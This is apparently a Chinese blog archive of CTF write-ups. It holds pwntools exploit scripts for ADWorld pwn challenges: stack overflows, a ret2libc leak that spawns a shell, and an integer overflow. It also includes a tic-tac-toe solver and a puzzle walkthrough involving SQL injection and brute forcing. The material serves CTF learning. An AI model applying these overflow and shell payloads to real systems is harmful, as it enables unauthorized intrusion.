2020 CTF 新年红包解析
发表评论
分类目录归档:信息安全
BJD CTF Programming notakto_1
不知名CTF比赛的不知名题目,类井字棋,要写程序判断。
写了两个程序:如下:
C++有漏洞,够用就行:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 | #include<iostream> #include<algorithm> using namespace std; int process[10] = { 4 }; bool visited[10]; inline int cal(int x, int y) { return x * 3 + y; } bool& vis(int x, int y) { return visited[cal(x, y)]; } bool check(int x, int y) { bool flag = false; flag |= vis(0, y) & vis(1, y) & vis(2, y); flag |= vis(x, 0) & vis(x, 1) & vis(x, 2); if (x == y)flag |= vis(0, 0) & vis(1, 1) & vis(2, 2); if (x + y == 2)flag |= vis(0, 2) & vis(1, 1) & vis(2, 0); return flag; } void print(int n) { for (int i = 0; i <= n; i++) { cout << process[i]; } cout << endl; } void dfs(int step) { bool flag = true; for (int i = 0; i < 9; i++) { if (visited[i])continue; visited[i] = true; process[step] = i; if (check(i / 3, i % 3) == 0) { dfs(step + 1); flag = false; } visited[i] = false; } if (flag&&step%2==1)print(step); } int main() { visited[4] = true; dfs(1); } |
python连带着往外发socket麻烦得很:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 | from pwn import * sock = remote("222.186.56.247",8122) wordList = [] currentWord = "" def findNewWord(): global currentWord,wordList for elem in wordList: if elem[0:len(currentWord)]==currentWord: return elem raise Exception("Error:Word Not found!") def loadDic(): global wordList with open("situation.txt","r") as f: wordList = f.readlines() def getIntfromSock(sock): sock.recvuntil("My move: ") x = sock.recv(1) if x==b' ': x = sock.recv(1) return int(x) def payGame(i): global currentWord,wordList,sock print("the ith:",i) currentWord="" while len(currentWord) < 5: backupWord = findNewWord() print("Send:",backupWord[len(currentWord)]) sock.sendline(str(backupWord[len(currentWord)])) currentWord += backupWord[len(currentWord)] if len(currentWord)==5: print("break") break currentWord += str(getIntfromSock(sock)) print("currentWord",currentWord) sock.recvuntil("win!") loadDic() for i in range(150): payGame(i) sock.interactive() |
代码链接:notakto
ADWorld Pwn level3
完全看着WriteUp写的,里面说了个PLT和GOT表,这个概念之前接触过一点,但没怎么用过。模仿人家代码的时候也没怎么细想。先敲一遍将来就理解深刻了。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 | from pwn import * p = remote("111.198.29.45",33161) elf = ELF("./level3") libc = ELF("./libc_32.so.6") write_plt=elf.plt['write'] write_got=elf.got['write'] main_addr=elf.sym['main'] p.recvuntil(":\n") payload=b'0'*0x88+p32(0)+p32(write_plt)+p32(main_addr)+p32(1)+p32(write_got)+p32(4) p.sendline(payload) write_got_addr=u32(p.recv()) print(hex(write_got_addr)) libc_base=write_got_addr-libc.sym['write'] print(hex(libc_base)) system_addr=libc_base+libc.sym['system'] print(hex(system_addr)) binshaddr=libc_base+0x15902B print(hex(binshaddr)) payload2=b'0'*0x88+p32(0)+p32(system_addr)+p32(0)+p32(binshaddr) p.recvuntil(":\n") p.sendline(payload2) p.interactive() |
ADWorld Pwn when_did_you_born
1 2 3 4 5 6 7 | from pwn import * p = remote("111.198.29.45",36585) p.sendlineafter("Birth?","0") payload=b'0'*(0x8)+p32(1926) print(len(payload)) p.sendlineafter("Name?",payload) p.interactive() |
ADWorld Pwn cgpwn2
好像会点了^v^
1 2 3 4 5 6 7 8 9 | from pwn import * p = remote("111.198.29.45",55602) p.sendlineafter("your name","/bin/sh") strAddr=0x0804A080 sysAddr=0x08048420 payload=b'0'*(0x26+0x4)+p32(sysAddr)+p32(0)+p32(strAddr) print(len(payload)) p.sendlineafter("here:",payload) p.interactive() |
ADWorld Pwn int_overflow
整数溢出的题目,之前从没做过,所以看了WriteUp。
1 2 3 4 5 6 7 8 9 | from pwn import * p = remote("111.198.29.45",56345) p.sendlineafter("Your choice:","1") p.sendlineafter("username:","123") flagAddr=0x0804868B payload=b'0'*(0x14+0x4)+p32(flagAddr)+b'0'*(0x105-0x8-0x14) print(len(payload)) p.sendlineafter("passwd:",payload) p.interactive() |
ADWorld Pwn guess_num
经Imagin大佬入门指点开始没事干闲的做点PWN玩,看了两个栈溢出的例子Writeup体验了一下,这个是第三个题目,自己做了一下,做出来了。
栈溢出覆盖随机数种子,写一个C程序用gcc编译一下能生成一模一样的随机数。
Pwn代码如下
1 2 3 4 5 | from pwn import * p = remote("111.198.29.45",44610) payload=bytearray('0'*0x24,"utf-8") p.sendline(payload) p.interactive() |
2017红包解析
红包网址:http://rb.renjikai.website/2017-redbag1/
解析rb1:老套路,审查元素form的Hidden,year=2017提交即可。
出现decode_base64(‘u606du559cu4f60u4eecu901au8fc7u0072u0062u0031u7ea2u5305’)
base64解码得
刚刚才发现我出错了,本来应该是base64解码的,我忘了给字符串加Base64了……
直接对u606du559cu4f60u4eecu901au8fc7u0072u0062u0031u7ea2u5305进行unicode转中文(网上各类小工具,用Notepad把u替换\u即可)得到“恭喜你们通过rb1红包”,这个是支付宝中文口令。
查看rb1源代码可以发现注释small hint for rb2:sql injection,明确rb2目标sql注入。
解析rb2:sql注入:username和password都输入
即可,出支付宝红包口令translate_to_chinese(“congratulation”)+”C2AEE99934″,translate_to_chinese(“congratulation”)是“恭喜”+”C2AEE99934″=“恭喜C2AEE99934″即为支付宝中文红包口令。
解析rb3:新套路,暴力破解。
查看html源码,有注释guess is a 4-digit postive number,可以编写脚本从1000尝试到9999自动Post即可,最后发现这个数是5716,输出数字口令88281030。
目前该页面已经移动到http://rb.renjikai.website/2017-redbag1/(早已下线),感兴趣的同学可以稍后尝试,源代码稍后发布。
源代码下载地址:https://pan.renjikai.com/Bucket/2017-redbag1.zip
ISCC 2016 WriteUp 汇总整理
就是下面给几个网址:
ISCC 2016 逆向部分 writeup – GlodsNow的博客 – 博客频道 – CSDN http://blog.csdn.net/glodsnow/article/details/51497679
ISCC 2016 WEB WRITEUP – P@SSw0@d!!的日志 – 网易博客 ttp://blog.163.com/passw0a_d/blog/static/250807061201643072655863/
2016 ISCC CTF 比赛 BASE 心灵鸡汤 http://blog.csdn.net/aj_shang/article/details/51612934
ISCC 2016 wirteup -Basic http://blog.sina.com.cn/s/blog_ab9229c10102webi.html
iscc2016 pwn部分writeup http://www.zhimengzhe.com/linux/57136.html
密码保护:Android 5.1.1 平板电脑 Nabi DreamTab HD 8 被禁止安装 APK,破除限制
要查看留言请输入您的密码。